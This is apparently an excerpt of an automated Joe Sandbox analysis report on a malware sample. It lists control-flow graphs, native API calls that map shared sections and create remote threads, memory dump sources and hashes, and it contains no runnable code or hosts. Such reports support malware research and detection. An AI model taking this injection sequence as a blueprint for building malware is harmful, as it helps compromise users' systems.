                                        • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 163 401538-401567 169 401558-401563 163->169 170 40156a-401590 call 4011b7 163->170 169->170 177 401592 170->177 178 401595-40159a 170->178 177->178 180 4015a0-4015b1 178->180 181 4018b8-4018c0 178->181 185 4018b6-4018c5 180->185 186 4015b7-4015e0 180->186 181->178 189 4018da 185->189 190 4018cb-4018d6 185->190 186->185 195 4015e6-4015fd NtDuplicateObject 186->195 189->190 191 4018dd-401915 call 4011b7 189->191 190->191 195->185 196 401603-401627 NtCreateSection 195->196 199 401683-4016a9 NtCreateSection 196->199 200 401629-40164a NtMapViewOfSection 196->200 199->185 203 4016af-4016b3 199->203 200->199 202 40164c-401668 NtMapViewOfSection 200->202 202->199 205 40166a-401680 202->205 203->185 206 4016b9-4016da NtMapViewOfSection 203->206 205->199 206->185 208 4016e0-4016fc NtMapViewOfSection 206->208 208->185 211 401702 call 401707 208->211
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                        • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                        • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                        • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 213 4014de-4014ed 214 401563 213->214 215 4014ef 213->215 216 40156a-401590 call 4011b7 214->216 217 401551-401552 215->217 218 4014f1-401502 215->218 236 401592 216->236 237 401595-40159a 216->237 217->214 220 401504-401516 218->220 221 40151d-40152d 218->221 223 40151b-40151c 220->223 226 4014ba 221->226 227 40152f-401535 221->227 223->221 229 401447-401456 226->229 230 4014bc-4014c3 226->230 238 40144c-401470 229->238 233 4014c5-4014c8 230->233 234 401539-401567 230->234 239 4014cf 233->239 234->216 251 401558-401560 234->251 236->237 248 4015a0-4015b1 237->248 249 4018b8-4018c0 237->249 252 401473-401484 238->252 242 4014d6 239->242 242->242 246 4014d8 242->246 246->223 259 4018b6-4018c5 248->259 260 4015b7-4015e0 248->260 249->237 251->214 256 40147b-4014a5 call 4011b7 252->256 256->223 270 4014a7 256->270 265 4018da 259->265 266 4018cb-4018d6 259->266 260->259 273 4015e6-4015fd NtDuplicateObject 260->273 265->266 268 4018dd-401915 call 4011b7 265->268 266->268 270->239 274 4014a9-4014b5 270->274 273->259 275 401603-401627 NtCreateSection 273->275 276 401471-401472 274->276 277 4014b7-4014b8 274->277 280 401683-4016a9 NtCreateSection 275->280 281 401629-40164a NtMapViewOfSection 275->281 276->252 277->226 282 401449 277->282 280->259 286 4016af-4016b3 280->286 281->280 284 40164c-401668 NtMapViewOfSection 281->284 282->256 285 40144b 282->285 284->280 288 40166a-401680 284->288 285->238 286->259 289 4016b9-4016da NtMapViewOfSection 286->289 288->280 289->259 291 4016e0-4016fc NtMapViewOfSection 289->291 291->259 294 401702 call 401707 291->294
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectView
                                        • String ID:
                                        • API String ID: 1652636561-0
                                        • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                        • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                        • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                        • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 296 401543-401544 297 401546-401567 296->297 298 4015af-4015b1 296->298 307 401558-401563 297->307 308 40156a-401590 call 4011b7 297->308 300 4018b6-4018c5 298->300 301 4015b7-4015e0 298->301 305 4018da 300->305 306 4018cb-4018d6 300->306 301->300 317 4015e6-4015fd NtDuplicateObject 301->317 305->306 311 4018dd-401915 call 4011b7 305->311 306->311 307->308 326 401592 308->326 327 401595-40159a 308->327 317->300 319 401603-401627 NtCreateSection 317->319 323 401683-4016a9 NtCreateSection 319->323 324 401629-40164a NtMapViewOfSection 319->324 323->300 329 4016af-4016b3 323->329 324->323 328 40164c-401668 NtMapViewOfSection 324->328 326->327 338 4015a0-4015ad 327->338 339 4018b8-4018c0 327->339 328->323 331 40166a-401680 328->331 329->300 332 4016b9-4016da NtMapViewOfSection 329->332 331->323 332->300 335 4016e0-4016fc NtMapViewOfSection 332->335 335->300 340 401702 call 401707 335->340 338->298 339->327
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                        • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                        • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                        • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 344 401565-401590 call 4011b7 349 401592 344->349 350 401595-40159a 344->350 349->350 352 4015a0-4015b1 350->352 353 4018b8-4018c0 350->353 357 4018b6-4018c5 352->357 358 4015b7-4015e0 352->358 353->350 361 4018da 357->361 362 4018cb-4018d6 357->362 358->357 367 4015e6-4015fd NtDuplicateObject 358->367 361->362 363 4018dd-401915 call 4011b7 361->363 362->363 367->357 368 401603-401627 NtCreateSection 367->368 371 401683-4016a9 NtCreateSection 368->371 372 401629-40164a NtMapViewOfSection 368->372 371->357 375 4016af-4016b3 371->375 372->371 374 40164c-401668 NtMapViewOfSection 372->374 374->371 377 40166a-401680 374->377 375->357 378 4016b9-4016da NtMapViewOfSection 375->378 377->371 378->357 380 4016e0-4016fc NtMapViewOfSection 378->380 380->357 383 401702 call 401707 380->383
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                        • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                        • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                        • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 385 401579-401590 call 4011b7 391 401592 385->391 392 401595-40159a 385->392 391->392 394 4015a0-4015b1 392->394 395 4018b8-4018c0 392->395 399 4018b6-4018c5 394->399 400 4015b7-4015e0 394->400 395->392 403 4018da 399->403 404 4018cb-4018d6 399->404 400->399 409 4015e6-4015fd NtDuplicateObject 400->409 403->404 405 4018dd-401915 call 4011b7 403->405 404->405 409->399 410 401603-401627 NtCreateSection 409->410 413 401683-4016a9 NtCreateSection 410->413 414 401629-40164a NtMapViewOfSection 410->414 413->399 417 4016af-4016b3 413->417 414->413 416 40164c-401668 NtMapViewOfSection 414->416 416->413 419 40166a-401680 416->419 417->399 420 4016b9-4016da NtMapViewOfSection 417->420 419->413 420->399 422 4016e0-4016fc NtMapViewOfSection 420->422 422->399 425 401702 call 401707 422->425
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                        • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                        • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                        • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 427 40157c-401590 call 4011b7 431 401592 427->431 432 401595-40159a 427->432 431->432 434 4015a0-4015b1 432->434 435 4018b8-4018c0 432->435 439 4018b6-4018c5 434->439 440 4015b7-4015e0 434->440 435->432 443 4018da 439->443 444 4018cb-4018d6 439->444 440->439 449 4015e6-4015fd NtDuplicateObject 440->449 443->444 445 4018dd-401915 call 4011b7 443->445 444->445 449->439 450 401603-401627 NtCreateSection 449->450 453 401683-4016a9 NtCreateSection 450->453 454 401629-40164a NtMapViewOfSection 450->454 453->439 457 4016af-4016b3 453->457 454->453 456 40164c-401668 NtMapViewOfSection 454->456 456->453 459 40166a-401680 456->459 457->439 460 4016b9-4016da NtMapViewOfSection 457->460 459->453 460->439 462 4016e0-4016fc NtMapViewOfSection 460->462 462->439 465 401702 call 401707 462->465
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                        • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                        • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                        • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 467 402fe9-40300d 468 403140-403145 467->468 469 403013-40302b 467->469 469->468 470 403031-403042 469->470 471 403044-40304d 470->471 472 403052-403060 471->472 472->472 473 403062-403069 472->473 474 40308b-403092 473->474 475 40306b-40308a 473->475 476 4030b4-4030b7 474->476 477 403094-4030b3 474->477 475->474 478 4030c0 476->478 479 4030b9-4030bc 476->479 477->476 478->471 481 4030c2-4030c7 478->481 479->478 480 4030be 479->480 480->481 481->468 482 4030c9-4030cc 481->482 482->468 483 4030ce-40313d RtlCreateUserThread NtTerminateProcess 482->483 483->468
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CreateProcessTerminateThreadUser
                                        • String ID:
                                        • API String ID: 1921587553-0
                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 484 22a209c-22a20b5 485 22a20b7-22a20b9 484->485 486 22a20bb 485->486 487 22a20c0-22a20cc CreateToolhelp32Snapshot 485->487 486->487 488 22a20ce-22a20d4 487->488 489 22a20dc-22a20e9 Module32First 487->489 488->489 494 22a20d6-22a20da 488->494 490 22a20eb-22a20ec call 22a1d5b 489->490 491 22a20f2-22a20fa 489->491 495 22a20f1 490->495 494->485 494->489 495->491
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 022A20C4
                                        • Module32First.KERNEL32(00000000,00000224), ref: 022A20E4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0229B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_229b000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3833638111-0
                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction ID: b5cbda057fd971715a864b16c0820bf5680e56a18c2476aa2b783e6eddf62f7f
                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction Fuzzy Hash: 6AF09632110711EFD7303BF5989DB6E76EDEF59724F100629EA46918C4DB70E8458A61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 21d003c-21d0047 1 21d004c-21d0263 call 21d0a3f call 21d0e0f call 21d0d90 VirtualAlloc 0->1 2 21d0049 0->2 17 21d028b-21d0292 1->17 18 21d0265-21d0289 call 21d0a69 1->18 2->1 20 21d02a1-21d02b0 17->20 22 21d02ce-21d03c2 VirtualProtect call 21d0cce call 21d0ce7 18->22 20->22 23 21d02b2-21d02cc 20->23 29 21d03d1-21d03e0 22->29 23->20 30 21d0439-21d04b8 VirtualFree 29->30 31 21d03e2-21d0437 call 21d0ce7 29->31 32 21d04be-21d04cd 30->32 33 21d05f4-21d05fe 30->33 31->29 35 21d04d3-21d04dd 32->35 36 21d077f-21d0789 33->36 37 21d0604-21d060d 33->37 35->33 40 21d04e3-21d0505 35->40 41 21d078b-21d07a3 36->41 42 21d07a6-21d07b0 36->42 37->36 43 21d0613-21d0637 37->43 51 21d0517-21d0520 40->51 52 21d0507-21d0515 40->52 41->42 44 21d086e-21d08be LoadLibraryA 42->44 45 21d07b6-21d07cb 42->45 46 21d063e-21d0648 43->46 50 21d08c7-21d08f9 44->50 48 21d07d2-21d07d5 45->48 46->36 49 21d064e-21d065a 46->49 53 21d0824-21d0833 48->53 54 21d07d7-21d07e0 48->54 49->36 55 21d0660-21d066a 49->55 56 21d08fb-21d0901 50->56 57 21d0902-21d091d 50->57 58 21d0526-21d0547 51->58 52->58 62 21d0839-21d083c 53->62 59 21d07e4-21d0822 54->59 60 21d07e2 54->60 61 21d067a-21d0689 55->61 56->57 63 21d054d-21d0550 58->63 59->48 60->53 64 21d068f-21d06b2 61->64 65 21d0750-21d077a 61->65 62->44 66 21d083e-21d0847 62->66 68 21d0556-21d056b 63->68 69 21d05e0-21d05ef 63->69 70 21d06ef-21d06fc 64->70 71 21d06b4-21d06ed 64->71 65->46 72 21d0849 66->72 73 21d084b-21d086c 66->73 76 21d056d 68->76 77 21d056f-21d057a 68->77 69->35 74 21d06fe-21d0748 70->74 75 21d074b 70->75 71->70 72->44 73->62 74->75 75->61 76->69 80 21d057c-21d0599 77->80 81 21d059b-21d05bb 77->81 84 21d05bd-21d05db 80->84 81->84 84->63
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 021D024D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_21d0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID: cess$kernel32.dll
                                        • API String ID: 4275171209-1230238691
                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction ID: 671f0ada710d20adefc1c2dcdc996983a2ec8ffecd7f62bbe8e0ccc1b23024bb
                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction Fuzzy Hash: B2526A75A41229DFDB64CF68C984BACBBB1BF09304F1580D9E94DAB351DB30AA85CF14

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 497 21d0e0f-21d0e24 SetErrorMode * 2 498 21d0e2b-21d0e2c 497->498 499 21d0e26 497->499 499->498
                                        APIs
                                        • SetErrorMode.KERNELBASE(00000400,?,?,021D0223,?,?), ref: 021D0E19
                                        • SetErrorMode.KERNELBASE(00000000,?,?,021D0223,?,?), ref: 021D0E1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_21d0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction ID: 3cf7066f3c277190ebbdbd16f9613bb646a05e9011dfd1008548e03a8f07cb7b
                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction Fuzzy Hash: 7AD01231145128BBD7002AA4DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 592 401918-401943 597 401946-40197b call 4011b7 Sleep call 40143e 592->597 598 40193a-40193f 592->598 606 40198a-4019d3 call 4011b7 597->606 607 40197d-401985 call 401538 597->607 598->597 607->606
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401966
                                          • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                          • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                          • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                        • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                        • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                        • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 621 401924-401943 625 401946-40197b call 4011b7 Sleep call 40143e 621->625 626 40193a-40193f 621->626 634 40198a-4019d3 call 4011b7 625->634 635 40197d-401985 call 401538 625->635 626->625 635->634
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401966
                                          • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                          • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                          • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                        • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                        • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                        • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022A1DAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0229B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_229b000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction ID: 7e95e9238b0fdc3b12b9210f67e97209dcb018109f41795a4d6e975f830f82ec
                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction Fuzzy Hash: 25113C79A00208EFDB01DF98C985E98BBF5AF08351F058094F948AB361D371EA50DF80
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401966
                                          • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                          • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                          • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                        • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                        • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                        • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401966
                                          • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                          • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                          • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
